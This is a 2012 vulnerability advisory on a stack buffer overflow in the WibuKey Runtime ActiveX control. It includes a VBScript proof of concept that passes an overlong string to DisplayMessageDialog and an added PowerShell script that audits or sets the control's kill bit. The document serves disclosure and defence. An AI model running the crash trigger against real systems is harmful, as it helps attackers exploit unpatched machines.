PRL-2012-35

#####################################################################################

Application:   WibuKey Runtime for Windows ActiveX Control Buffer Overflow Vulnerability

Platforms:   Windows

Version:   The vulnerability is confirmed in version 6.00f Build 140. Other versions may also be affected.

Secunia: SA49987

{PRL}:   2012-35
Author:   Francis Provencher (Protek Research Lab’s)

Website:   http://www.protekresearchlab.com/

Twitter:   @ProtekResearch

#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) The Code

#####################################################################################

===============
1) Introduction
===============

 

Our reliable WibuKey is still available for many interfaces and operating systems.
For your new projects however, we recommend our flexible CodeMeter® technology
with scalable security features ranging from software activation through to dongle solutions,
and including extensive licensing management functionalities.

http://www.wibu.com/en/wibukey/downloads/showDownloadNotice/softwareschutz-broschre-2009-de-121.html

 

#####################################################################################

============================
2) Report Timeline
============================

2012-07-19 – Vulnerability reported to Secunia
2012-12-26 – Coordinated public release of advisory

#####################################################################################

============================
3) Technical details
============================

The vulnerability is caused by a boundary error within the WkWin32.dll module
when processing the “DisplayMessageDialog()” method. This can be exploited to
cause a stack-based buffer overflow via an overly long string passed as the parameter
to the method. Successful exploitation allows execution of arbitrary code.

#####################################################################################

===========
4) The Code
===========

 

<package><job>
<object classid='clsid:00010000-0000-1011-8002-0000C06B5161' id='target' />
<script language='vbscript'>

' Details of the control and method under test
targetFile = "C:\Program Files (x86)\WIBUKEY\Bin\Wibukey.dll"
prototype  = "Sub DisplayMessageDialog ( ByVal Message As String )"
memberName = "DisplayMessageDialog"
progid     = "WIBUKEYLib.Wibukey"
argCount   = 1

' Overly long string passed as the Message parameter
arg1=String(9236, "A")

target.DisplayMessageDialog arg1

</script></job></package>
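
Mitigation sketch (an added example, not part of the original advisory or of any vendor tooling): the script below audits or sets the ActiveX kill bit for the CLSID shown in the <object> tag above, so that Internet Explorer and other hosts that honor kill bits refuse to instantiate the control. The registry location and the 0x400 flag are the standard Windows kill-bit mechanism; the script layout and the -AuditOnly switch are choices made for this example. Windows Script Host does not consult kill bits, so this only reduces browser-side exposure.

```powershell
# Added example: audit or set the ActiveX kill bit for the control in this advisory.
# Run from an elevated prompt. Use -AuditOnly to report state without changing it.
param([switch]$AuditOnly)

$Clsid     = '{00010000-0000-1011-8002-0000C06B5161}'  # CLSID from the advisory
$KillBit   = 0x00000400                                 # kill-bit value in Compatibility Flags
$ValueName = 'Compatibility Flags'

# 64-bit Windows has separate registry views for 64-bit and 32-bit hosts.
$Roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

foreach ($root in $Roots) {
    # The Wow6432Node view does not exist on 32-bit Windows.
    if (-not (Test-Path -LiteralPath $root)) { continue }
    $key = Join-Path $root $Clsid

    # Read any flags already present so they are preserved.
    $flags = 0
    if (Test-Path -LiteralPath $key) {
        $prop = Get-ItemProperty -LiteralPath $key -Name $ValueName -ErrorAction SilentlyContinue
        if ($prop) { $flags = $prop.$ValueName }
    }
    $isSet = ($flags -band $KillBit) -ne 0

    if (-not $isSet -and -not $AuditOnly) {
        if (-not (Test-Path -LiteralPath $key)) {
            New-Item -Path $key -Force | Out-Null
        }
        $flags = $flags -bor $KillBit
        New-ItemProperty -LiteralPath $key -Name $ValueName -PropertyType DWord `
            -Value $flags -Force | Out-Null
        $isSet = $true
    }

    # One result object per registry view, suitable for piping to a report.
    [pscustomobject]@{
        Key        = $key
        Flags      = '0x{0:X8}' -f $flags
        KillBitSet = $isSet
    }
}
```

Applications that legitimately load the control inside an Internet Explorer-based host will stop working once the kill bit is set, so run with -AuditOnly first.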

 

 

 

################################################################################